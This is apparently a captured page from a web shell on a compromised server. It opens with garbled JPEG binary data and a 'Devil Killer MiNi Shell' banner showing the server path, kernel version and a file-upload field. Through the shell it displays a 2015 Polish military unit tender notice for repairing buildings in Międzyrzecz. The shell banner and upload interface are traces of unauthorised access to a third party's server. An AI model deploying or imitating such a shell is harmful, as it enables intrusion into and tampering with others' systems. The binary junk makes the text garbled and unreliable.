JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150527/77095-N-2015.html

<p class="kh_header"><b>Wędrzyn: Roboty konserwacyjne polegające na:
Część I- Naprawa elewacji, pomieszczeń budynek nr 10, 64 w JW 5701 m. Międzyrzecz
Część II- Naprawa pomieszczeń  budynek nr 41 w JW 5700 m. Międzyrzecz
Część III- Naprawa elewacji budynku z naprawą instalacji elektrycznej budynku nr 67 w JW 5701 m. Międzyrzecz</b><br>
<b>Numer ogłoszenia: 77095 - 2015; data zamieszczenia: 27.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 5701 Wędrzyn , 69-211 Wędrzyn, woj. lubuskie, tel. 95 7556236, faks 95 7556222.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www45wog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Skarbu Państwa podległa MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty konserwacyjne polegające na:
Część I- Naprawa elewacji, pomieszczeń budynek nr 10, 64 w JW 5701 m. Międzyrzecz
Część II- Naprawa pomieszczeń  budynek nr 41 w JW 5700 m. Międzyrzecz
Część III- Naprawa elewacji budynku z naprawą instalacji elektrycznej budynku nr 67 w JW 5701 m. Międzyrzecz.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I:
Zakres przedmiotu zamówienia:
 -roboty rozbiórkowe - rozebranie pokrycia dachu z papy na konstrukcji drewnianej i pokrycia z blachy stalowej ocynkowanej, wykucie z muru stolarki okiennej stalowej, rozbiórka ścianek z płyt ogrodzeniowych i cegły pełnej, skucie tynku zewnętrznego (baranek cementowy) 
-roboty dekarskie : wykonanie nowego pokrycia dachu i ścian z blachy trapezowej ocynkowanej wraz z zamontowaniem nowej rury spustowej z blachy tytan cynk. grubości 0,60 mm.
-roboty stolarskie (montaż nowej stolarki okiennej PCV zgodnie z wymogami Zamawiającego. 
-murarsko-tynkarskie - wykonanie tynków  zewnętrznych kat. III na ścianach i na ościeżach okiennych i drzwiowych.
-roboty posadzkarskie - wykonanie podkładów betonowych na istniejących podłożach z zatarciem na ostro.
-roboty malarskie - malowanie tynków zewnętrznych farbą akrylową, malowanie istniejącej i nowej konstrukcji wiat farbą miniową farbami nawierzchniowymi.  
-roboty elektryczne - skrócenie przewodów instalacji odgromowej z wykonaniem uziomów prętowych i pomiarów powykonawczych.
Część II:
 Zakres przedmiotu zamówienia: 
-roboty rozbiórkowe - dokonanie demontażu zużytych wykładzin podłogowych PCV, rozebranie posadzek z płytek ( powierzchnie tarasowe).  Wykucie z muru ościeżnic okiennych drewnianych ( okienko podawcze )
-roboty posadzkowe  : wykonanie posadzek z wykładzin obiektowych, wykonanie posadzek tarasu z płytek kamiennych. 
-roboty malarskie (wykonanie gładzi gipsowych na sufitach i ścianach, oraz na wyprawach tynkarskich - bruzdach po robotach elektrycznych, odnowienie malatury pomieszczeń parteru i I piętra , 
-roboty elektryczne ( wymiana przewodów i osprzętu instalacji elektrycznej w  pomieszczeniach budynku  wraz z rozdzielnicą.
Część III:
Zakres przedmiotu zamówienia: 
-roboty rozbiórkowe - dokonanie demontażu zużytej wykładziny podłogowej z PCV, skucie tynków zewnętrznych, rozebranie parapetów zewnętrznych z płytek, rozebranie ogrodzenia z siatki w ramach z kątownika. 
-roboty posadzkowe - wykonanie posadzki z wykładzin obiektowych, wykonanie posadzki antyelektrostatycznej, wykonanie posadzki podestu przed wejściem z płytek gresowych antypoślizgowych, wykonanie nawierzchni betonowych zewnętrznych. 
-murarsko-tynkarskie - wykonanie tynków  zewnętrznych kat. II na ścianach i na ościeżach okiennych i drzwiowych, na wykonanym tynku wykonanie tynku akrylowego cienkowarstwowego. 	 Wykonanie tynku akrylowego cienkowarstwowego na istniejącym słupie na uprzednio przyklejonej siatce.                                                                                                
-roboty malarskie - wykonanie gładzi gipsowych na sufitach i ścianach, oraz na wyprawach tynkarskich (bruzdach po robotach elektrycznych), odnowienie malatury pomieszczeń , malowanie opierzeń, rynien i rur spustowych po uprzednim odtłuszczeniu.
-roboty elektryczne - wymiana przewodów i osprzętu instalacji elektrycznej w  pomieszczeniach budynku wraz z rozdzielnicą.
Szczegółowy opis przedmiotu zamówienia określono w Specyfikacji technicznego wykonania  i odbioru robót budowlanych ,  stanowiącej załącznik nr 2 do SIWZ oraz przedmiarze robót  ( załącznik nr 9 do SIWZ).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.41.00.00-4, 45.44.21.00-8, 45.44.22.00-9, 45.45.00.00-6, 45.00.00.00-7, 45.40.00.00-1, 45.42.10.00-4, 45.44.00.00-3, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Ustala się wadium w wysokości :
         - dla części I -  700,00 zł brutto (słownie: siedemset złotych - 00-100);
        - dla części II -  500,00 zł brutto (słownie: pięćset złotych - 00-100);
        - dla części III - 500,00 zł brutto (słownie: pięćset złotych - 00-100);

     2. Wadium należy wnieść przed upływem terminu składania ofert. 
         Wadium można wnieść w   jednej lub kilku następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824 z późn. zm.).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy: 
NBP oddział w Zielonej Górze nr 28 1010 1704 0060 0213 9120 1000 z dopiskiem:
 
Przetarg nieograniczony - roboty konserwacyjne polegające na:
Część I: Naprawa elewacji, pomieszczeń budynek nr 10, 64 w JW 5701 m. Międzyrzecz
Część II: Naprawa pomieszczeń  budynek nr 41 w JW 5700 m. Międzyrzecz
Część III: Naprawa elewacji budynku z naprawą instalacji elektrycznej budynku nr 67 w JW 5701 m. Międzyrzecz


 Skuteczne wniesienie  wadium w pieniądzu następuje z chwilą wpływu środków
 pieniężnych   na rachunek bankowy wskazany powyżej, przed upływem terminu 
składania ofert.
Stosowny dowód potwierdzający wniesienie wadium należy załączyć do oferty.

Termin ważności wadium złożonego w innej formie niż pieniądz, powinien obejmować cały okres związania ofertą. W przypadku form innych niż pieniądz, musi być precyzyjnie określone: kto jest gwarantem, beneficjentem oraz zleceniodawcą gwarancji, wysokość kwoty gwarancji, termin ważności oraz zobowiązanie podmiotu udzielającego gwarancji do zapłaty wadium w przypadkach przewidzianych w art. 46 ustawy, mianowicie: Wykonawca, którego oferta została wybrana jako najkorzystniejsza odmówi podpisania umowy na warunkach określonych w ofercie, nie wniesie wymaganego zabezpieczenia należytego wykonania umowy, zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy, Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, z przyczyn leżących  po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 cyt. ustawy   lub pełnomocnictw,  listy podmiotów należących do tej samej grupy  kapitałowej, lub  nie wyraził zgodny na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3,  co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.  
Również poręczenie musi precyzyjnie określać, za kogo poręczyciel dokonuje poręczenia, do jakiej wysokości i na jaki czas oraz wskazywać przedmiot poręczenia.
Z treści gwarancji lub poręczenia musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta (poręczyciela). Gwarancja (poręczenie) musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta (poręczyciela). Podpis winien być sporządzony w sposób umożliwiający jego identyfikacją np. złożony wraz z imienną pieczątką lub czytelny  (z podaniem imienia i nazwiska). 
Gwarancja lub poręczenie powinno zawierać stwierdzenie, że na pierwsze pisemne żądanie zamawiającego - zgłoszone w terminie związania ofertą - wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji i art. 46 ust. 4a i 5 ustawy - następuje jego bezwarunkowa wypłata, bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela. 
Dowodem wniesienia wadium w innej formie niż pieniądz jest załączenie do oferty kopii gwarancji lub poręczenia. Oryginał dokumentu (wadium w formie niepieniężnej) należy zdeponować w kancelarii jawnej (bud. 33 II piętro, pok.211), wskazanej jako miejsce składania ofert w terminie tożsamym, z terminem składania ofert, tj. do 11.06.2015r.    do godz. 09:45.
W przypadku wniesienia odwołania po otwarciu ofert Zamawiający, nie później niż na 7 dni przed upływem ważności wadium, wzywa Wykonawców, pod rygorem wykluczenia                         z postępowania, do przedłużenia ważności wadium albo wniesienia nowego wadium na okres niezbędny do zabezpieczenia postępowania do zawarcia umowy. Jeżeli odwołanie wniesiono po wyborze oferty najkorzystniejszej, wezwanie kieruje się jedynie do Wykonawcy, którego ofertę wybrano jako najkorzystniejszą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania zamówienia nie wymaga posiadania specjalnych uprawnień. Zamawiający uzna warunek za spełniony na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu, zgodnie z formułą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału  w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz   z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej   i prawidłowo ukończone. 
Wykonawca wykaże dowody należytego wykonania co najmniej trzech robót odpowiadających przedmiotowi zamówienia,  z której każda z nich będzie opiewała na kwotę:
- dla części I - minimum   50.000,00 zł brutto;
- dla części II - minimum 35.000,00 zł brutto:
- dla części III - minimum 35.000,00 zł brutto:
W przypadku złożenia oferty na więcej niż jedną część Wykonawca wykaże dowody należytego wykonania co najmniej trzech robót odpowiadających przedmiotowi zamówienia,  z której każda z nich będzie opiewała co najmniej na sumę poszczególnych części.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego  oświadczenia   o posiadaniu niezbędnego potencjału technicznego  o którym mowa 
w art. 44  ustawy Pzp  (załącznik nr 5 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonych dokumentów:
oświadczenia, że osoby  które będą uczestniczyć w wykonywaniu zamówienia posiadają uprawnienia budowlane   do kierowania robotami w specjalności: 
a) dla części I:
- konstrukcyjno-budowlanej,
- instalacyjne w zakresie sieci , instalacji, urządzeń  elektrycznych i elektroenergetycznych.
b) dla części II:
- konstrukcyjno-budowlanej,
- instalacyjne w zakresie sieci , instalacji, urządzeń  elektrycznych i elektroenergetycznych.
c) dla części III:
- konstrukcyjno-budowlanej,
- instalacyjne w zakresie sieci , instalacji, urządzeń  elektrycznych i elektroenergetycznych, a także posiadają aktualne zaświadczenie potwierdzające przynależność  do właściwej Izby   Samorządu Zawodowego na podstawie złożonego oświadczenia, o którym mowa  w art. 44  ustawy Pzp  (załącznik nr 5 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej   i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda następujących dokumentów: 
- opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego,  że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - obejmujący naprawy i szkody powstałe w czasie wykonania robót na gwarantowaną sumę ubezpieczenia    w wysokości minimum:
- dla części I -   70.000,00 zł;
- dla części II - 50.000,00 zł;
- dla części III - 50.000,00 zł.
 
W przypadku złożenia oferty na więcej niż jedną część, kwota polisy musi opiewać minimum na sumę poszczególnych części.
Ocena spełniania warunku będzie dokonana na podstawie złożonego dokumentu na    zasadzie spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany Formularz ofertowy z wykorzystaniem wzoru   zamieszczonego w niniejszej SIWZ - Załącznik nr 1 do SIWZ.
2. Oświadczenie o robotach podzleconych - Załącznik nr 7 do SIWZ.
3. Kosztorys ofertowy wypełniony zgodnie z przedmiarem robót - Załącznik nr 9       
do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - termin realizacji - 20</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.45wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa Nr 5701; 69-211 Wędrzyn; bud.33 pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2015 godzina 09:45, miejsce: Jednostka Wojskowa Nr 5701; 69-211 Wędrzyn bud.33 
II piętro Kancelaria Jawna pokój nr 211.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Naprawa elewacji, pomieszczeń budynek nr 10, 64 w JW 5701 m. Międzyrzecz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia:
 -roboty rozbiórkowe - rozebranie pokrycia dachu z papy na konstrukcji drewnianej i pokrycia z blachy stalowej ocynkowanej, wykucie z muru stolarki okiennej stalowej, rozbiórka ścianek z płyt ogrodzeniowych i cegły pełnej, skucie tynku zewnętrznego (baranek cementowy) 
-roboty dekarskie : wykonanie nowego pokrycia dachu i ścian z blachy trapezowej ocynkowanej wraz z zamontowaniem nowej rury spustowej z blachy tytan cynk. grubości 0,60 mm.
-roboty stolarskie (montaż nowej stolarki okiennej PCV zgodnie z wymogami Zamawiającego. 
-murarsko-tynkarskie - wykonanie tynków  zewnętrznych kat. III na ścianach i na ościeżach okiennych i drzwiowych.
-roboty posadzkarskie - wykonanie podkładów betonowych na istniejących podłożach z zatarciem na ostro.
-roboty malarskie - malowanie tynków zewnętrznych farbą akrylową, malowanie istniejącej i nowej konstrukcji wiat farbą miniową farbami nawierzchniowymi.  
-roboty elektryczne - skrócenie przewodów instalacji odgromowej z wykonaniem uziomów prętowych i pomiarów powykonawczych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.41.00.00-4, 45.44.21.00-8, 45.44.22.00-9, 45.45.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. termin realizacji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Naprawa pomieszczeń  budynek nr 41 w JW 5700 m. Międzyrzecz.</p>
